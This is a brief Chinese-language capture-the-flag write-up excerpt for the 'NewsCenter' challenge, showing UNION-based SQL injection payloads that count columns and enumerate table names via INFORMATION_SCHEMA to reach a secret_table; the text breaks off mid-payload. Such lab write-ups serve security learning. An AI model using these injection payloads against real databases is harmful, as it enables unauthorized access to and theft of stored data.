攻防世界 - NewsCenter - WriteUp

NewsCenter 這一題考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 來初步判斷該sql查詢返回三列數據 然後用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名，很明顯我們需要得到 secret_table 表中的內容 再用 '

>>阅读原文<<